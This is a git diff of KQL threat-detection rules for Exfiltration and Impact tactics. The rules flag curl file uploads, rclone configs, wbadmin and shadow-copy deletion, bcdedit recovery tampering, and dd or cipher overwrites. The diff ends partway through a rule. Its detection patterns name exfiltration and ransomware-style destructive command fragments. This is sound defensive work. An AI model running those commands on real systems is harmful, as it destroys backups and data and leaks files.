+// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+// False Positives:
+// - Testing or development activity
+
+DeviceProcessEvents
 | where ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) and (ProcessCommandLine contains "http.server" or ProcessCommandLine contains "SimpleHTTPServer")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/rclone_config_file_creation.kql b/KQL/rules/Exfiltration/rclone_config_file_creation.kql
index 876c3f50..016519fa 100644
--- a/KQL/rules/Exfiltration/rclone_config_file_creation.kql
+++ b/KQL/rules/Exfiltration/rclone_config_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: Rclone Config File Creation
-// Author: Aaron Greetham (@beardofbinary) - NCC Group
-// Date: 2021-05-26
-// Level: medium
-// Description: Detects Rclone config files being created
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1567.002
-// False Positives:
-// - Legitimate Rclone usage
-
-DeviceFileEvents
+// Title: Rclone Config File Creation
+// Author: Aaron Greetham (@beardofbinary) - NCC Group
+// Date: 2021-05-26
+// Level: medium
+// Description: Detects Rclone config files being created
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+// False Positives:
+// - Legitimate Rclone usage
+
+DeviceFileEvents
 | where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql
index fd3ff922..1a657308 100644
--- a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql
+++ b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql
@@ -1,12 +1,12 @@
-// Title: Split A File Into Pieces
-// Author: Igor Fits, Mikhail Larin, oscd.community
-// Date: 2020-10-15
-// Level: low
-// Description: Detection use of the command "split" to split files into parts and possible transfer.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1030
-// False Positives:
-// - Legitimate administrative activity
-
-DeviceProcessEvents
+// Title: Split A File Into Pieces
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-15
+// Level: low
+// Description: Detection use of the command "split" to split files into parts and possible transfer.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1030
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
 | where FolderPath endswith "/split"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql
index 8cc06d5b..b704ae58 100644
--- a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql
+++ b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Curl File Upload - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
-// Date: 2022-09-15
-// Level: medium
-// Description: Detects a suspicious curl process start the adds a file to a web request
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105
-// False Positives:
-// - Scripts created by developers and admins
-
-DeviceProcessEvents
+// Title: Suspicious Curl File Upload - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects a suspicious curl process start the adds a file to a web request
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105
+// False Positives:
+// - Scripts created by developers and admins
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and FolderPath endswith "/curl") and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql
index 5a428f6c..c2d29199 100644
--- a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql
+++ b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Outbound SMTP Connections
-// Author: frack113
-// Date: 2022-01-07
-// Level: medium
-// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
-// The data may also be sent to an alternate network location from the main command and control server.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048.003
-// False Positives:
-// - Other SMTP tools
-
-DeviceNetworkEvents
+// Title: Suspicious Outbound SMTP Connections
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
+// The data may also be sent to an alternate network location from the main command and control server.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+// False Positives:
+// - Other SMTP tools
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("25", "587", "465", "2525")) and (not(((InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\" or (InitiatingProcessFolderPath endswith "\\HxTsr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_"))))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql
index af385f82..d59836e8 100644
--- a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql
+++ b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious PowerShell Mailbox Export to Share
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-08-07
-// Level: critical
-// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration
-
-DeviceProcessEvents
+// Title: Suspicious PowerShell Mailbox Export to Share
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-07
+// Level: critical
+// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql
index 0407bd60..5f4fcf52 100644
--- a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql
+++ b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Redirection to Local Admin Share
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-16
-// Level: high
-// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048
-
-DeviceProcessEvents
+// Title: Suspicious Redirection to Local Admin Share
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-16
+// Level: high
+// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
index ce3cf983..1e39d40e 100644
--- a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
+++ b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious WebDav Client Execution Via Rundll32.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023-03-16
-// Level: high
-// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397
-
-DeviceProcessEvents
+// Title: Suspicious WebDav Client Execution Via Rundll32.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2023-03-16
+// Level: high
+// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." 
or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254.")))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/tap_installer_execution.kql b/KQL/rules/Exfiltration/tap_installer_execution.kql
index f9e38623..aeabdbf9 100644
--- a/KQL/rules/Exfiltration/tap_installer_execution.kql
+++ b/KQL/rules/Exfiltration/tap_installer_execution.kql
@@ -1,12 +1,12 @@
-// Title: Tap Installer Execution
-// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community
-// Date: 2019-10-24
-// Level: medium
-// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048
-// False Positives:
-// - Legitimate OpenVPN TAP installation
-
-DeviceProcessEvents
+// Title: Tap Installer Execution
+// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048
+// False Positives:
+// - Legitimate OpenVPN TAP installation
+
+DeviceProcessEvents
 | where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\")))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
index 2295277a..057f3ed2 100644
--- a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
+++ b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
@@ -1,11 +1,11 @@
-// Title: WebDav Client Execution Via Rundll32.EXE
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: medium
-// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
-// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048.003
-
-DeviceProcessEvents
+// Title: WebDav Client Execution Via Rundll32.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
+// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
index 06f13399..2390cd58 100644
--- a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
+++ b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
@@ -1,12 +1,12 @@
-// Title: All Backups Deleted Via Wbadmin.EXE
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-12-13
-// Level: high
-// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
-// This technique is used by numerous ransomware families and actors.
-// This may only be successful on server platforms that have Windows Backup enabled.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-
-DeviceProcessEvents
+// Title: All Backups Deleted Via Wbadmin.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: high
+// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
+// This technique is used by numerous ransomware families and actors.
+// This may only be successful on server platforms that have Windows Backup enabled.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Impact/backup_files_deleted.kql b/KQL/rules/Impact/backup_files_deleted.kql
index 93f9a0f6..dc38bd01 100644
--- a/KQL/rules/Impact/backup_files_deleted.kql
+++ b/KQL/rules/Impact/backup_files_deleted.kql
@@ -1,12 +1,12 @@
-// Title: Backup Files Deleted
-// Author: frack113
-// Date: 2022-01-02
-// Level: medium
-// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Legitimate usage
-
-DeviceFileEvents
+// Title: Backup Files Deleted
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate usage
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk")
\ No newline at end of file
diff --git a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql
index fdfe32b3..6dd33a8b 100644
--- a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql
+++ b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql
@@ -1,12 +1,12 @@
-// Title: Boot Configuration Tampering Via Bcdedit.EXE
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019-10-24
-// Level: high
-// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Boot Configuration Tampering Via Bcdedit.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set"
\ No newline at end of file
diff --git a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql
index 5daf3a9e..c3fb7683 100644
--- a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql
+++ b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql
@@ -1,12 +1,12 @@
-// Title: Copy From VolumeShadowCopy Via Cmd.EXE
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021-08-09
-// Level: high
-// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Backup scenarios using the commandline
-
-DeviceProcessEvents
+// Title: Copy From VolumeShadowCopy Via Cmd.EXE
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Backup scenarios using the commandline
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/Impact/dd_file_overwrite.kql b/KQL/rules/Impact/dd_file_overwrite.kql
index 35a093b5..7b496334 100644
--- a/KQL/rules/Impact/dd_file_overwrite.kql
+++ b/KQL/rules/Impact/dd_file_overwrite.kql
@@ -1,12 +1,12 @@
-// Title: DD File Overwrite
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
-// Date: 2021-10-15
-// Level: low
-// Description: Detects potential overwriting and deletion of a file using DD.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1485
-// False Positives:
-// - Any user deleting files that way.
-
-DeviceProcessEvents
+// Title: DD File Overwrite
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects potential overwriting and deletion of a file using DD.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+// False Positives:
+// - Any user deleting files that way.
+
+DeviceProcessEvents
 | where (FolderPath in~ ("/bin/dd", "/usr/bin/dd")) and ProcessCommandLine contains "of=" and (ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/null")
\ No newline at end of file
diff --git a/KQL/rules/Impact/delete_all_scheduled_tasks.kql b/KQL/rules/Impact/delete_all_scheduled_tasks.kql
index 8f4881b5..3b763009 100644
--- a/KQL/rules/Impact/delete_all_scheduled_tasks.kql
+++ b/KQL/rules/Impact/delete_all_scheduled_tasks.kql
@@ -1,12 +1,12 @@
-// Title: Delete All Scheduled Tasks
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-09
-// Level: high
-// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1489
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Delete All Scheduled Tasks
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/delete_important_scheduled_task.kql b/KQL/rules/Impact/delete_important_scheduled_task.kql
index 2cbc5c3f..81a41fb2 100644
--- a/KQL/rules/Impact/delete_important_scheduled_task.kql
+++ b/KQL/rules/Impact/delete_important_scheduled_task.kql
@@ -1,12 +1,12 @@
-// Title: Delete Important Scheduled Task
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-09
-// Level: high
-// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1489
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Delete Important Scheduled Task
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
index 0fd00424..7b5a1979 100644
--- a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
+++ b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql
@@ -1,12 +1,12 @@
-// Title: Deleted Data Overwritten Via Cipher.EXE
-// Author: frack113
-// Date: 2021-12-26
-// Level: medium
-// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
-// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
-// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1485
-
-DeviceProcessEvents
+// Title: Deleted Data Overwritten Via Cipher.EXE
+// Author: frack113
+// Date: 2021-12-26
+// Level: medium
+// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
+// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
+// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe")
\ No newline at end of file
diff --git a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql
index b32244be..aa94672f 100644
--- a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql
+++ b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql
@@ -1,10 +1,10 @@
-// Title: Deletion of Volume Shadow Copies via WMI with PowerShell
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022-09-20
-// Level: high
-// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-
-DeviceProcessEvents
+// Title: Deletion of Volume Shadow Copies via WMI with PowerShell
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-20
+// Level: high
+// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/Impact/disable_important_scheduled_task.kql b/KQL/rules/Impact/disable_important_scheduled_task.kql
index 891eaadc..123f1198 100644
--- a/KQL/rules/Impact/disable_important_scheduled_task.kql
+++ b/KQL/rules/Impact/disable_important_scheduled_task.kql
@@ -1,10 +1,10 @@
-// Title: Disable Important Scheduled Task
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior
-// Date: 2021-12-26
-// Level: high
-// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1489
-
-DeviceProcessEvents
+// Title: Disable Important Scheduled Task
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior
+// Date: 2021-12-26
+// Level: high
+// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
index 99f2d1d8..cd73bab1 100644
--- a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
+++ b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql
@@ -1,11 +1,11 @@
-// Title: File Recovery From Backup Via Wbadmin.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024-05-10
-// Level: medium
-// Description: Detects the recovery of files from backups via "wbadmin.exe".
-// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-
-DeviceProcessEvents
+// Title: File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects the recovery of files from backups via "wbadmin.exe".
+// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
